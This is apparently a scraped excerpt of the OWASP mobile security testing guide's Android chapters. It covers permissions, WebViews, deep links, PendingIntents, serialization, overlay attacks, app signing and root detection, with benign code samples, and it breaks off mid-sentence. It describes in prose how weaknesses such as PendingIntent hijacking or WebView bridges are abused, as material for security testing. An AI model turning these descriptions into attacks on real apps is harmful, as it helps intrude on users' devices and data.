Prior to Android 10, the READ_PHONE_STATE
permission would be classified as HIGH, due to the permanent device identifiers (e.g. (IMEI/MEID, IMSI, SIM, and build serial) that it guards. However, starting from Android 10, a bulk of the sensitive information that can be used for tracking has been moved, refactored or rescoped into a new permission called READ_PRIVILEGED_PHONE_STATE
, putting the new permission in the HIGH category, but resulting in the READ_PHONE_STATE
permission moving to LOW.
Android 8.0 (API level 26) Changes:
The following changes affect all apps running on Android 8.0 (API level 26), even to those apps targeting lower API levels.
READ_CONTACTS
permission, queries for contact's usage data will return approximations rather than exact values (the auto-complete API is not affected by this change).Apps targeting Android 8.0 (API level 26) or higher are affected by the following:
GET_ACCOUNTS
permission granted, unless the authenticator owns the accounts or the user grants that access.PHONE
permissions group:ANSWER_PHONE_CALLS
permission allows to answer incoming phone calls programmatically (via acceptRingingCall
).READ_PHONE_NUMBERS
permission grants read access to the phone numbers stored in the device.Restrictions when granting dangerous permissions: Dangerous permissions are classified into permission groups (e.g. the STORAGE
group contains READ_EXTERNAL_STORAGE
and WRITE_EXTERNAL_STORAGE
). Before Android 8.0 (API level 26), it was sufficient to request one permission of the group in order to get all permissions of that group also granted at the same time. This has changed starting at Android 8.0 (API level 26): whenever an app requests a permission at runtime, the system will grant exclusively that specific permission. However, note that all subsequent requests for permissions in that permission group will be automatically granted without showing the permissions dialog to the user. See this example from the Android developer documentation:
Suppose an app lists both READ_EXTERNAL_STORAGE and WRITE_EXTERNAL_STORAGE in its manifest. The app requests READ_EXTERNAL_STORAGE and the user grants it. If the app targets API level 25 or lower, the system also grants WRITE_EXTERNAL_STORAGE at the same time, because it belongs to the same STORAGE permission group and is also registered in the manifest. If the app targets Android 8.0 (API level 26), the system grants only READ_EXTERNAL_STORAGE at that time; however, if the app later requests WRITE_EXTERNAL_STORAGE, the system immediately grants that privilege without prompting the user.
You can see the list of permission groups in the Android developer documentation. To make this a bit more confusing, Google also warns that particular permissions might be moved from one group to another in future versions of the Android SDK and therefore, the logic of the app shouldn't rely on the structure of these permission groups. The best practice is to explicitly request every permission whenever it's needed.
Android 9 (API Level 28) Changes:
The following changes affect all apps running on Android 9, even to those apps targeting API levels lower than 28.
READ_CALL_LOG
, WRITE_CALL_LOG
, and PROCESS_OUTGOING_CALLS
(dangerous) permissions are moved from PHONE
to the new CALL_LOG
permission group. This means that being able to make phone calls (e.g. by having the permissions of the PHONE
group granted) is not sufficient to get access to the call logs.READ_CALL_LOG
permission when running on Android 9 (API level 28).WifiManager.getConnectionInfo
unless all of the following is true:ACCESS_FINE_LOCATION
or ACCESS_COARSE_LOCATION
permission.ACCESS_WIFI_STATE
permission.Apps targeting Android 9 (API level 28) or higher are affected by the following:
Build.getSerial
) unless the READ_PHONE_STATE
(dangerous) permission is granted.Android 10 (API level 29) Changes:
Android 10 (API level 29) introduces several user privacy enhancements. The changes regarding permissions affect to all apps running on Android 10 (API level 29), including those targeting lower API levels.
READ_FRAME_BUFFER
, CAPTURE_VIDEO_OUTPUT
, and CAPTURE_SECURE_VIDEO_OUTPUT
permissions are now signature-access only, which prevents silent access to the device's screen contents.Activity Permission Enforcement:
Permissions are applied via android:permission
attribute within the <activity>
tag in the manifest. These permissions restrict which applications can start that Activity. The permission is checked during Context.startActivity
and Activity.startActivityForResult
. Not holding the required permission results in a SecurityException
being thrown from the call.
Service Permission Enforcement:
Permissions applied via android:permission
attribute within the <service>
tag in the manifest restrict who can start or bind to the associated Service. The permission is checked during Context.startService
, Context.stopService
and Context.bindService
. Not holding the required permission results in a SecurityException
being thrown from the call.
Broadcast Permission Enforcement:
Permissions applied via android:permission
attribute within the <receiver>
tag restrict access to send broadcasts to the associated BroadcastReceiver
. The held permissions are checked after Context.sendBroadcast
returns, while trying to deliver the sent broadcast to the given receiver. Not holding the required permissions doesn't throw an exception, the result is an unsent broadcast.
A permission can be supplied to Context.registerReceiver
to control who can broadcast to a programmatically registered receiver. Going the other way, a permission can be supplied when calling Context.sendBroadcast
to restrict which broadcast receivers are allowed to receive the broadcast.
Note that both a receiver and a broadcaster can require a permission. When this happens, both permission checks must pass for the intent to be delivered to the associated target. For more information, please reference the section \"Restricting broadcasts with permissions\" in the Android Developers Documentation.
Content Provider Permission Enforcement:
Permissions applied via android:permission
attribute within the <provider>
tag restrict access to data in a ContentProvider. Content providers have an important additional security facility called URI permissions which is described next. Unlike the other components, ContentProviders have two separate permission attributes that can be set, android:readPermission
restricts who can read from the provider, and android:writePermission
restricts who can write to it. If a ContentProvider is protected with both read and write permissions, holding only the write permission does not also grant read permissions.
Permissions are checked when you first retrieve a provider and as operations are performed using the ContentProvider. Using ContentResolver.query
requires holding the read permission; using ContentResolver.insert
, ContentResolver.update
, ContentResolver.delete
requires the write permission. A SecurityException
will be thrown from the call if proper permissions are not held in all these cases.
Content Provider URI Permissions:
The standard permission system is not sufficient when being used with content providers. For example a content provider may want to limit permissions to READ permissions in order to protect itself, while using custom URIs to retrieve information. An application should only have the permission for that specific URI.
The solution is per-URI permissions. When starting or returning a result from an activity, the method can set Intent.FLAG_GRANT_READ_URI_PERMISSION
and/or Intent.FLAG_GRANT_WRITE_URI_PERMISSION
. This grants permission to the activity for the specific URI regardless if it has permissions to access to data from the content provider.
This allows a common capability-style model where user interaction drives ad-hoc granting of fine-grained permission. This can be a key facility for reducing the permissions needed by apps to only those directly related to their behavior. Without this model in place malicious users may access other member's email attachments or harvest contact lists for future use via unprotected URIs. In the manifest the android:grantUriPermissions
attribute or the node help restrict the URIs.
Here you can find more information about APIs related to URI Permissions:
Android allows apps to expose their services/components to other apps. Custom permissions are required for app access to the exposed components. You can define custom permissions in AndroidManifest.xml
by creating a permission tag with two mandatory attributes: android:name
and android:protectionLevel
.
It is crucial to create custom permissions that adhere to the Principle of Least Privilege: permission should be defined explicitly for its purpose, with a meaningful and accurate label and description.
Below is an example of a custom permission called START_MAIN_ACTIVITY
, which is required when launching the TEST_ACTIVITY
Activity.
The first code block defines the new permission, which is self-explanatory. The label tag is a summary of the permission, and the description is a more detailed version of the summary. You can set the protection level according to the types of permissions that will be granted. Once you've defined your permission, you can enforce it by adding it to the application's manifest. In our example, the second block represents the component that we are going to restrict with the permission we created. It can be enforced by adding the android:permission
attributes.
<permission android:name=\"com.example.myapp.permission.START_MAIN_ACTIVITY\"\n android:label=\"Start Activity in myapp\"\n android:description=\"Allow the app to launch the activity of myapp app, any app you grant this permission will be able to launch main activity by myapp app.\"\n android:protectionLevel=\"normal\" />\n\n<activity android:name=\"TEST_ACTIVITY\"\n android:permission=\"com.example.myapp.permission.START_MAIN_ACTIVITY\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n</activity>\n
Once the permission START_MAIN_ACTIVITY
has been created, apps can request it via the uses-permission
tag in the AndroidManifest.xml
file. Any application granted the custom permission START_MAIN_ACTIVITY
can then launch the TEST_ACTIVITY
. Please note <uses-permission android:name=\"myapp.permission.START_MAIN_ACTIVITY\" />
must be declared before the <application>
or an exception will occur at runtime. Please see the example below that is based on the permission overview and manifest-intro.
<manifest>\n<uses-permission android:name=\"com.example.myapp.permission.START_MAIN_ACTIVITY\" />\n <application>\n <activity>\n </activity>\n </application>\n</manifest>\n
We recommend using a reverse-domain annotation when registering a permission, as in the example above (e.g. com.domain.application.permission
) in order to avoid collisions with other applications.
WebViews are Android's embedded components which allow your app to open web pages within your application. In addition to mobile apps related threats, WebViews may expose your app to common web threats (e.g. XSS, Open Redirect, etc.).
One of the most important things to do when testing WebViews is to make sure that only trusted content can be loaded in it. Any newly loaded page could be potentially malicious and try to exploit any WebView bindings or try to phish the user. Unless you're developing a browser app, usually you'd like to restrict the pages being loaded to the domain of your app. A good practice is to prevent the user from even having the chance to input any URLs inside WebViews (which is the default on Android) or navigate outside the trusted domains. Even when navigating on trusted domains there's still the risk that the user might encounter and click on other links to untrustworthy content (e.g. if the page allows for other users to post comments). In addition, some developers might even override some default behavior which can be potentially dangerous for the user.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#safebrowsing-api","title":"SafeBrowsing API","text":"To provide a safer web browsing experience, Android 8.1 (API level 27) introduces the SafeBrowsing API
, which allows your application to detect URLs that Google has classified as a known threat.
By default, WebViews show a warning to users about the security risk with the option to load the URL or stop the page from loading. With the SafeBrowsing API you can customize your application's behavior by either reporting the threat to SafeBrowsing or performing a particular action such as returning back to safety each time it encounters a known threat. Please check the Android Developers documentation for usage examples.
You can use the SafeBrowsing API independently from WebViews using the SafetyNet library, which implements a client for Safe Browsing Network Protocol v4. SafetyNet allows you to analyze all the URLs that your app is supposed to load. You can check URLs with different schemes (e.g. http, file) since SafeBrowsing is agnostic to URL schemes, and against TYPE_POTENTIALLY_HARMFUL_APPLICATION
and TYPE_SOCIAL_ENGINEERING
threat types.
When sending URLs or files to be checked for known threats make sure they don't contain sensitive data which could compromise a user's privacy, or expose sensitive content from your application.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#virus-total-api","title":"Virus Total API","text":"Virus Total provides an API for analyzing URLs and local files for known threats. The API Reference is available on Virus Total developers page.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#javascript-execution-in-webviews","title":"JavaScript Execution in WebViews","text":"JavaScript can be injected into web applications via reflected, stored, or DOM-based Cross-Site Scripting (XSS). Mobile apps are executed in a sandboxed environment and don't have this vulnerability when implemented natively. Nevertheless, WebViews may be part of a native app to allow web page viewing. Every app has its own WebView cache, which isn't shared with the native Browser or other apps. On Android, WebViews use the WebKit rendering engine to display web pages, but the pages are stripped down to minimal functions, for example, pages don't have address bars. If the WebView implementation is too lax and allows usage of JavaScript, JavaScript can be used to attack the app and gain access to its data.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#webview-protocol-handlers","title":"WebView Protocol Handlers","text":"Several default schemas are available for Android URLs. They can be triggered within a WebView with the following:
WebViews can load remote content from an endpoint, but they can also load local content from the app data directory or external storage. If the local content is loaded, the user shouldn't be able to influence the filename or the path used to load the file, and users shouldn't be able to edit the loaded file.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#java-objects-exposed-through-webviews","title":"Java Objects Exposed Through WebViews","text":"Android offers a way for JavaScript execution in a WebView to call and use native functions of an Android app (annotated with @JavascriptInterface
) by using the addJavascriptInterface
method. This is known as a WebView JavaScript bridge or native bridge.
Please note that when you use addJavascriptInterface
, you're explicitly granting access to the registered JavaScript Interface object to all pages loaded within that WebView. This implies that, if the user navigates outside your app or domain, all other external pages will also have access to those JavaScript Interface objects which might present a potential security risk if any sensitive data is being exposed through those interfaces.
Warning: Take extreme care with apps targeting Android versions below Android 4.2 (API level 17) as they are vulnerable to a flaw in the implementation of addJavascriptInterface
: an attack that is abusing reflection, which leads to remote code execution when malicious JavaScript is injected into a WebView. This was due to all Java Object methods being accessible by default (instead of only those annotated).
Clearing the WebView resources is a crucial step when an app accesses any sensitive data within a WebView. This includes any files stored locally, the RAM cache and any loaded JavaScript.
As an additional measure, you could use server-side headers such as no-cache
, which prevent an application from caching particular content.
Starting on Android 10 (API level 29) apps are able to detect if a WebView has become unresponsive. If this happens, the OS will automatically call the onRenderProcessUnresponsive
method.
You can find more security best practices when using WebViews on Android Developers.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#deep-links","title":"Deep Links","text":"Deep links are URIs of any scheme that take users directly to specific content in an app. An app can set up deep links by adding intent filters on the Android Manifest and extracting data from incoming intents to navigate users to the correct activity.
Android supports two types of deep links:
myapp://
(not verified by the OS).http://
and https://
schemes and contain the autoVerify
attribute (which triggers OS verification).Deep Link Collision:
Using unverified deep links can cause a significant issue: any other apps installed on a user's device can declare and try to handle the same intent, which is known as deep link collision. Any arbitrary application can declare control over the exact same deep link belonging to another application.
In recent versions of Android this results in a so-called disambiguation dialog shown to the user that asks them to select the application that should handle the deep link. The user could make the mistake of choosing a malicious application instead of the legitimate one.
Android App Links:
In order to solve the deep link collision issue, Android 6.0 (API Level 23) introduced Android App Links, which are verified deep links based on a website URL explicitly registered by the developer. Clicking on an App Link will immediately open the app if it's installed.
There are some key differences from unverified deep links:
http://
and https://
schemes, any other custom URL schemes are not allowed.During implementation of a mobile application, developers may apply traditional techniques for IPC (such as using shared files or network sockets). The IPC system functionality offered by mobile application platforms should be used because it is much more mature than traditional techniques. Using IPC mechanisms with no security in mind may cause the application to leak or expose sensitive data.
The following is a list of Android IPC Mechanisms that may expose sensitive data:
Often while dealing with complex flows during app development, there are situations where an app A wants another app B to perform a certain action in the future, on app A's behalf. Trying to implement this by only using Intent
s leads to various security problems, like having multiple exported components. To handle this use case in a secure manner, Android provides the PendingIntent
API.
PendingIntent
are most commonly used for notifications, app widgets, media browser services, etc. When used for notifications, PendingIntent
is used to declare an intent to be executed when a user performs an action with an application's notification. The notification requires a callback to the application to trigger an action when the user clicks on it.
Internally, a PendingIntent
object wraps a normal Intent
object (referred as base intent) that will eventually be used to invoke an action. For example, the base intent specifies that an activity A should be started in an application. The receiving application of the PendingIntent
, will unwrap and retrieve this base intent and invoke the activity A by calling the PendingIntent.send
function.
A typical implementation for using PendingIntent
is below:
Intent intent = new Intent(applicationContext, SomeActivity.class); // base intent\n\n// create a pending intent\nPendingIntent pendingIntent = PendingIntent.getActivity(applicationContext, 0, intent, PendingIntent.FLAG_IMMUTABLE);\n\n// send the pending intent to another app\nIntent anotherIntent = new Intent();\nanotherIntent.setClassName(\"other.app\", \"other.app.MainActivity\");\nanotherIntent.putExtra(\"pendingIntent\", pendingIntent);\nstartActivity(anotherIntent);\n
What makes a PendingIntent
secure is that, unlike a normal Intent
, it grants permission to a foreign application to use the Intent
(the base intent) it contains, as if it were being executed by your application's own process. This allows an application to freely use them to create callbacks without the need to create exported activities.
If not implemented correctly, a malicious application can hijack a PendingIntent
. For example, in the notification example above, a malicious application with android.permission.BIND_NOTIFICATION_LISTENER_SERVICE
can bind to the notification listener service and retrieve the pending intent.
There are certain security pitfalls when implementing PendingIntent
s, which are listed below:
Mutable fields: A PendingIntent
can have mutable and empty fields that can be filled by a malicious application. This can lead to a malicious application gaining access to non-exported application components. Using the PendingIntent.FLAG_IMMUTABLE
flag makes the PendingIntent
immutable and prevents any changes to the fields. Prior to Android 12 (API level 31), the PendingIntent
was mutable by default, while since Android 12 (API level 31) it is changed to immutable by default to prevent accidental vulnerabilities.
Use of implicit intent: A malicious application can receive a PendingIntent
and then update the base intent to target the component and package within the malicious application. As a mitigation, ensure that you explicitly specify the exact package, action and component that will receive the base intent.
The most common case of PendingIntent
attack is when a malicious application is able to intercept it.
For further details, check the Android documentation on using a pending intent.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#implicit-intents","title":"Implicit Intents","text":"An Intent is a messaging object that you can use to request an action from another application component. Although intents facilitate communication between components in a variety of ways, there are three basic use cases: starting an activity, starting a service, and delivering a broadcast.
According to the Android Developers Documentation, Android provides two types of intents:
// Note the specification of a concrete component (DownloadActivity) that is started by the intent.\nIntent downloadIntent = new Intent(this, DownloadActivity.class);\ndownloadIntent.setAction(\"android.intent.action.GET_CONTENT\")\nstartActivityForResult(downloadIntent);\n
// Developers can also start an activity by just setting an action that is matched by the intended app.\nIntent downloadIntent = new Intent();\ndownloadIntent.setAction(\"android.intent.action.GET_CONTENT\")\nstartActivityForResult(downloadIntent);\n
The use of implicit intents can lead to multiple security risks, e.g. if the calling app processes the return value of the implicit intent without proper verification or if the intent contains sensitive data, it can be accidentally leaked to unauthorized third-parties.
You can refer to this blog post, this article and CWE-927 for more information about the mentioned problem, concrete attack scenarios and recommendations.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#object-persistence","title":"Object Persistence","text":"There are several ways to persist an object on Android:
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#object-serialization","title":"Object Serialization","text":"An object and its data can be represented as a sequence of bytes. This is done in Java via object serialization. Serialization is not inherently secure. It is just a binary format (or representation) for locally storing data in a .ser file. Encrypting and signing HMAC-serialized data is possible as long as the keys are stored safely. Deserializing an object requires a class of the same version as the class used to serialize the object. After classes have been changed, the ObjectInputStream
can't create objects from older .ser files. The example below shows how to create a Serializable
class by implementing the Serializable
interface.
import java.io.Serializable;\n\npublic class Person implements Serializable {\n private String firstName;\n private String lastName;\n\n public Person(String firstName, String lastName) {\n this.firstName = firstName;\n this.lastName = lastName;\n }\n //..\n //getters, setters, etc\n //..\n\n}\n
Now you can read/write the object with ObjectInputStream
/ObjectOutputStream
in another class.
There are several ways to serialize the contents of an object to JSON. Android comes with the JSONObject
and JSONArray
classes. A wide variety of libraries, including GSON, Jackson, Moshi, can also be used. The main differences between the libraries are whether they use reflection to compose the object, whether they support annotations, whether the create immutable objects, and the amount of memory they use. Note that almost all the JSON representations are String-based and therefore immutable. This means that any secret stored in JSON will be harder to remove from memory. JSON itself can be stored anywhere, e.g., a (NoSQL) database or a file. You just need to make sure that any JSON that contains secrets has been appropriately protected (e.g., encrypted/HMACed). See the chapter \"Data Storage on Android\" for more details. A simple example (from the GSON User Guide) of writing and reading JSON with GSON follows. In this example, the contents of an instance of the BagOfPrimitives
is serialized into JSON:
class BagOfPrimitives {\n private int value1 = 1;\n private String value2 = \"abc\";\n private transient int value3 = 3;\n BagOfPrimitives() {\n // no-args constructor\n }\n}\n\n// Serialization\nBagOfPrimitives obj = new BagOfPrimitives();\nGson gson = new Gson();\nString json = gson.toJson(obj);\n\n// ==> json is {\"value1\":1,\"value2\":\"abc\"}\n
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#xml","title":"XML","text":"There are several ways to serialize the contents of an object to XML and back. Android comes with the XmlPullParser
interface which allows for easily maintainable XML parsing. There are two implementations within Android: KXmlParser
and ExpatPullParser
. The Android Developer Guide provides a great write-up on how to use them. Next, there are various alternatives, such as a SAX
parser that comes with the Java runtime. For more information, see a blogpost from ibm.com. Similarly to JSON, XML has the issue of working mostly String based, which means that String-type secrets will be harder to remove from memory. XML data can be stored anywhere (database, files), but do need additional protection in case of secrets or information that should not be changed. See the chapter \"Data Storage on Android\" for more details. As stated earlier: the true danger in XML lies in the XML eXternal Entity (XXE) attack as it might allow for reading external data sources that are still accessible within the application.
There are libraries that provide functionality for directly storing the contents of an object in a database and then instantiating the object with the database contents. This is called Object-Relational Mapping (ORM). Libraries that use the SQLite database include
Realm, on the other hand, uses its own database to store the contents of a class. The amount of protection that ORM can provide depends primarily on whether the database is encrypted. See the chapter \"Data Storage on Android\" for more details. The Realm website includes a nice example of ORM Lite.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#parcelable","title":"Parcelable","text":"Parcelable
is an interface for classes whose instances can be written to and restored from a Parcel
. Parcels are often used to pack a class as part of a Bundle
for an Intent
. Here's an Android developer documentation example that implements Parcelable
:
public class MyParcelable implements Parcelable {\n private int mData;\n\n public int describeContents() {\n return 0;\n }\n\n public void writeToParcel(Parcel out, int flags) {\n out.writeInt(mData);\n }\n\n public static final Parcelable.Creator<MyParcelable> CREATOR\n = new Parcelable.Creator<MyParcelable>() {\n public MyParcelable createFromParcel(Parcel in) {\n return new MyParcelable(in);\n }\n\n public MyParcelable[] newArray(int size) {\n return new MyParcelable[size];\n }\n };\n\n private MyParcelable(Parcel in) {\n mData = in.readInt();\n }\n }\n
Because this mechanism that involves Parcels and Intents may change over time, and the Parcelable
may contain IBinder
pointers, storing data to disk via Parcelable
is not recommended.
Protocol Buffers by Google, are a platform- and language neutral mechanism for serializing structured data by means of the Binary Data Format. There have been a few vulnerabilities with Protocol Buffers, such as CVE-2015-5237. Note that Protocol Buffers do not provide any protection for confidentiality: there is no built in encryption.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#overlay-attacks","title":"Overlay Attacks","text":"Screen overlay attacks occur when a malicious application manages to put itself on top of another application which remains working normally as if it were on the foreground. The malicious app might create UI elements mimicking the look and feel of the original app or even the Android system UI. The intention is typically to make users believe that they keep interacting with the legitimate app and then try to elevate privileges (e.g. by getting some permissions granted), stealthy phishing, capture user taps and keystrokes, etc.
There are several attacks affecting different Android versions including:
SYSTEM_ALERT_WINDOW
(\"draw on top\") and BIND_ACCESSIBILITY_SERVICE
(\"a11y\") permissions that, in case the app is installed from the Play Store, the users do not need to explicitly grant and for which they are not even notified.Usually, this kind of attacks are inherent to an Android system version having certain vulnerabilities or design issues. This makes them challenging and often virtually impossible to prevent unless the app is upgraded targeting a safe Android version (API level).
Over the years many known malware like MazorBot, BankBot or MysteryBot have been abusing the screen overlay feature of Android to target business critical applications, namely in the banking sector. This blog discusses more about this type of malware.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#enforced-updating","title":"Enforced Updating","text":"Starting from Android 5.0 (API level 21), together with the Play Core Library, apps can be forced to be updated. This mechanism is based on using the AppUpdateManager
. Before that, other mechanisms were used, such as doing http calls to the Google Play Store, which are not as reliable as the APIs of the Play Store might change. Alternatively, Firebase could be used to check for possible forced updates as well (see this blog). Enforced updating can be really helpful when it comes to public key pinning (see the Testing Network communication for more details) when a pin has to be refreshed due to a certificate/public key rotation. Next, vulnerabilities are easily patched by means of forced updates.
Please note that newer versions of an application will not fix security issues that are living in the backends to which the app communicates. Allowing an app not to communicate with it might not be enough. Having proper API-lifecycle management is key here. Similarly, when a user is not forced to update, do not forget to test older versions of your app against your API and/or use proper API versioning.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/","title":"Android Code Quality and Build Settings","text":""},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#app-signing","title":"App Signing","text":"Android requires all APKs to be digitally signed with a certificate before they are installed or run. The digital signature is used to verify the owner's identity for application updates. This process can prevent an app from being tampered with or modified to include malicious code.
When an APK is signed, a public-key certificate is attached to it. This certificate uniquely associates the APK with the developer and the developer's private key. When an app is being built in debug mode, the Android SDK signs the app with a debug key created specifically for debugging purposes. An app signed with a debug key is not meant to be distributed and won't be accepted in most app stores, including the Google Play Store.
The final release build of an app must be signed with a valid release key. In Android Studio, the app can be signed manually or via creation of a signing configuration that's assigned to the release build type.
Prior Android 9 (API level 28) all app updates on Android need to be signed with the same certificate, so a validity period of 25 years or more is recommended. Apps published on Google Play must be signed with a key that that has a validity period ending after October 22th, 2033.
Three APK signing schemes are available:
The v2 signature, which is supported by Android 7.0 (API level 24) and above, offers improved security and performance compared to v1 scheme. The V3 signature, which is supported by Android 9 (API level 28) and above, gives apps the ability to change their signing keys as part of an APK update. This functionality assures compatibility and apps continuous availability by allowing both the new and the old keys to be used. Note that it is only available via apksigner at the time of writing.
For each signing scheme the release builds should always be signed via all its previous schemes as well.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#third-party-libraries","title":"Third-Party Libraries","text":"Android apps often make use of third party libraries. These third party libraries accelerate development as the developer has to write less code in order to solve a problem. There are two categories of libraries:
Mockito
used for testing and libraries like JavaAssist
used to compile certain other libraries.Okhttp3
.These libraries can lead to unwanted side-effects:
OKHTTP
prior to 2.7.5 in which TLS chain pollution was possible to bypass SSL pinning.Please note that this issue can hold on multiple levels: When you use webviews with JavaScript running in the webview, the JavaScript libraries can have these issues as well. The same holds for plugins/libraries for Cordova, React-native and Xamarin apps.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"Android applications run on a VM where most of the memory corruption issues have been taken care off. This does not mean that there are no memory corruption bugs. Take CVE-2018-9522 for instance, which is related to serialization issues using Parcels. Next, in native code, we still see the same issues as we explained in the general memory corruption section. Last, we see memory bugs in supporting services, such as with the Stagefright attack as shown at BlackHat.
Memory leaks are often an issue as well. This can happen for instance when a reference to the Context
object is passed around to non-Activity
classes, or when you pass references to Activity
classes to your helper classes.
Detecting the presence of binary protection mechanisms heavily depend on the language used for developing the application.
In general all binaries should be tested, which includes both the main app executable as well as all libraries/dependencies. However, on Android we will focus on native libraries since the main executables are considered safe as we will see next.
Android optimizes its Dalvik bytecode from the app DEX files (e.g. classes.dex) and generates a new file containing the native code, usually with an .odex, .oat extension. This Android compiled binary is wrapped using the ELF format which is the format used by Linux and Android to package assembly code.
The app's NDK native libraries also use the ELF format.
Learn more:
Debugging is an essential process for developers to identify and fix errors or bugs in their Android app. By using a debugger, developers can select the device to debug their app on and set breakpoints in their Java, Kotlin, and C/C++ code. This allows them to analyze variables and evaluate expressions at runtime, which helps them to identify the root cause of many issues. By debugging their app, developers can improve the functionality and user experience of their app, ensuring that it runs smoothly without any errors or crashes.
Every debugger-enabled process runs an extra thread for handling JDWP protocol packets. This thread is started only for apps that have the android:debuggable=\"true\"
attribute in the Application
element within the Android Manifest.
Generally, you should provide compiled code with as little explanation as possible. Some metadata, such as debugging information, line numbers, and descriptive function or method names, make the binary or bytecode easier for the reverse engineer to understand, but these aren't needed in a release build and can therefore be safely omitted without impacting the app's functionality.
To inspect native binaries, use a standard tool like nm
or objdump
to examine the symbol table. A release build should generally not contain any debugging symbols. If the goal is to obfuscate the library, removing unnecessary dynamic symbols is also recommended.
StrictMode is a developer tool for detecting violations, e.g. accidental disk or network access on the application's main thread. It can also be used to check for good coding practices, such as implementing performant code.
Here is an example of StrictMode
with policies enabled for disk and network access to the main thread:
public void onCreate() {\n if (DEVELOPER_MODE) {\n StrictMode.setThreadPolicy(new StrictMode.ThreadPolicy.Builder()\n .detectDiskReads()\n .detectDiskWrites()\n .detectNetwork() // or .detectAll() for all detectable problems\n .penaltyLog()\n .build());\n StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder()\n .detectLeakedSqlLiteObjects()\n .detectLeakedClosableObjects()\n .penaltyLog()\n .penaltyDeath()\n .build());\n }\n super.onCreate();\n }\n
Inserting the policy in the if
statement with the DEVELOPER_MODE
condition is recommended. To disable StrictMode
, DEVELOPER_MODE
must be disabled for the release build.
Exceptions occur when an application gets into an abnormal or error state. Both Java and C++ may throw exceptions. Testing exception handling is about ensuring that the app will handle an exception and transition to a safe state without exposing sensitive information via the UI or the app's logging mechanisms.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/","title":"Android Anti-Reversing Defenses","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#general-disclaimer","title":"General Disclaimer","text":"The lack of any of these measures does not cause a vulnerability - instead, they are meant to increase the app's resilience against reverse engineering and specific client-side attacks.
None of these measures can assure a 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win (given enough time and resources)!
For example, preventing debugging is virtually impossible. If the app is publicly available, it can be run on an untrusted device that is under full control of the attacker. A very determined attacker will eventually manage to bypass all the app's anti-debugging controls by patching the app binary or by dynamically modifying the app's behavior at runtime with tools such as Frida.
You can learn more about principles and technical risks of reverse engineering and code modification in these OWASP documents:
In the context of anti-reversing, the goal of root detection is to make running the app on a rooted device a bit more difficult, which in turn blocks some of the tools and techniques reverse engineers like to use. Like most other defenses, root detection is not very effective by itself, but implementing multiple root checks that are scattered throughout the app can improve the effectiveness of the overall anti-tampering scheme.
For Android, we define \"root detection\" a bit more broadly, including custom ROMs detection, i.e., determining whether the device is a stock Android build or a custom build.
In the following section, we list some common root detection methods you'll encounter. You'll find some of these methods implemented in the OWASP UnCrackable Apps for Android that accompany the OWASP Mobile Testing Guide.
Root detection can also be implemented through libraries such as RootBeer.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#google-play-integrity","title":"Google Play Integrity","text":"Google has launched the Google Play Integrity API to improve the security and integrity of apps and games on Android starting with Android 4.4 (level 19). The previous official API, SafetyNet, did not cover all the security needs that Google wanted for the platform, so Play Integrity was developed with the basic functions of the previous API and integrated additional features. This change aims to protect users from dangerous and fraudulent interactions.
Google Play Integrity offers the following safeguards:
The API provides four macro categories of information to help the security team make a decision. These categories include:
Request Details: In this section, details are obtained about the app package that requested the integrity check, including its format (e.g., com.example.myapp), a base64-encoded ID provided by the developer to link the request with the integrity certificate, and the execution time of the request in milliseconds.
App Integrity: This section provides information about the integrity of the app, including the result of the verification (referred to as the verdict), which indicates whether the app's installation source is trusted (via Play Store) or unknown/suspicious. If the installation source is considered secure, the app version will also be displayed.
Account Details: This category provides information about the app licensing status. The result can be LICENSED
, indicating that the user purchased or installed the app on the Google Play Store; UNLICENSED
, meaning that the user does not own the app or did not acquire it through the Google Play Store; or UNEVALUATED
, which means that the licensing details could not be evaluated because a necessary requirement is missing, that is, the device may not be trustworthy enough or the installed app version is not recognized by the Google Play Store.
Device Integrity: This section presents information that verifies the authenticity of the Android environment in which the app is running.
MEETS_DEVICE_INTEGRITY
: The app is on an Android device with Google Play Services, passing system integrity checks and compatibility requirements.
MEETS_BASIC_INTEGRITY
: The app is on a device that may not be approved to run Google Play Services but passes basic integrity checks, possibly due to an unrecognized Android version, unlocked bootloader, or lack of manufacturer certification.MEETS_STRONG_INTEGRITY
: The app is on a device with Google Play Services, ensuring robust system integrity with features like hardware-protected boot.MEETS_VIRTUAL_INTEGRITY
: The app runs in an emulator with Google Play Services, passing system integrity checks and meeting Android compatibility requirements.API Errors:
The API can return local errors such as APP_NOT_INSTALLED
and APP_UID_MISMATCH
, which can indicate a fraud attempt or attack. In addition, outdated Google Play Services or Play Store can also cause errors, and it is important to check these situations to ensure proper integrity verification functionality and to ensure the environment is not intentionally set up for an attack. You can find more details on the official page.
Best practices:
Minimize queries to the Play Protect API to reduce device resource impact. For example, employ the API only for essential device integrity verifications.
Include a NONCE
